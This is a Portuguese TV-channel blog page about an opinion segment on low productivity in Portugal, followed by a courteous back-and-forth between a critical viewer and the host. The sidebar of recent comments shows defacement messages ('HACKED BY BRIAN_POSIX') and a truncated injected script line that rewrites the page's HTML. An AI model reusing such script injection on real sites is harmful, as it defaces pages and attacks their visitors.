Na 1ª pessoa @ 19:02

Ter, 22/02/11

Portugal produz em média menos 30% do que os restantes países da OCDE, e ocupa o 34º lugar do ranking da produtividade global.

 

Vamos nesta rubrica saber porquê:

Serão as empresas portuguesas pouco competitivas ou os trabalhadores têm maus hábitos de trabalho, preguiça ou distracção?

Como fazer para “render” mais nos nossos empregos?



3sqhz9fFernanda @ 19:42

Qua, 23/02/11

 

Meu Deus!!!
Esta Senhora é mesmo muito fraquinha!!!
Não tem nada haver com a qualidade deste programa!! Peço desculpa!!
mas, cada semana que passa penso que está pior!!
Desculpem!


mjlopoc @ 20:31

Qua, 23/02/11

 

Olá sou a Maria João Lopo de Carvalho, tenho pena que nao goste da rubrica, mas todas as críticas são positivas, se me disser o que gostaria de ver tratado tudo farei para ir ao encontro dos seus gostos!
um abraço
Maria João

Fernanda @ 21:34

Qua, 23/02/11

 

Boa noite Maria João, peço desculpa pelo meu comentário, mas na realidade não consigo gostar da sua rubrica. Não se prende exactamente com os temas discutidos, que no meu entender até têm algum interesse, mas porque não consigo concordar com muitas das coisas que a Maria João diz, e a maneira como as diz.
Um exemplo, ainda hoje quando se referia aos funcionários publicos, a Maria João não pode fazer o tipo de generalizaões que faz, é de um abuso extremamente excessivo, no meu entender claro!! Quando pergunta, ou perguntou a Ana Rita Clara porque colocaria um post, quase que a ridicularizou por ela não ter dito aquilo que queria, ou que no seu entender, é o que pensa que está correcto. Não sei se me estou a fazer entender!!!!
Não é nada simpático da minha parte fazer este tipo de comentários, mas achei que o devia fazer.
Peço desculpa se não estou a ser justa consigo, mas estou somente a avaliar os poucos minutos que a vejo nesta rubrica.
Cum


mjlopoc @ 10:28

Qui, 24/02/11

 

Ola Fernanda! Concordo com o seu ponto de vista, em parte! no que diz respeito aos funcionários publicos fui bem clara disse "em parte" nao generalizei ( tive esse cuidado) se quiser voltar a ver pode faze-lo aqui neste espaço. Verá que nao generalizei, embora este rubrica seja baseada na minha opinião pessoal, visto tratar-se de uma "crónica de opinião" e quanto ao FB nao acho que tenha redicularizado a Ana Rita, aliás diferenças de opinião são salutares num directo. Tenho a certeza que a Fernanda concorda comigo, quando pomos um post no FB queremos ver comentarios não é? bom vou tentar generalizar menos! Aqui fica um OBRIGADA para si e um gd bj para a próxima vou-me esforçar para que goste mais! MJ

Fernanda @ 12:17

Qui, 24/02/11

 

Obrigada Maria João pela sua cordialidade e postura.
Aceito todas as suas justificações.
É assim mesmo, o poder de podermos expor as nossas opiniões e não serem todas iguais nem concordantes, é assim que se evolui e se atinge algo de novo, ou não, mas fala-se sobre....!!!
Até Quarta-feira.
Cumprimentos muito sinceros.
Fernanda


mjlopoc @ 14:14

Qui, 24/02/11

 

Obrigada Fernanda, assim ja me sinto menos triste... agora só estarei na quarta 16 de Março mas tb no programa da Adelaide ( sic mulher 19H) a falar de Livros, sexta dia 4 de Março.
Ganhou uma amiga! Bjs Mj

Fernanda @ 19:32

Qui, 24/02/11

 

:)

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO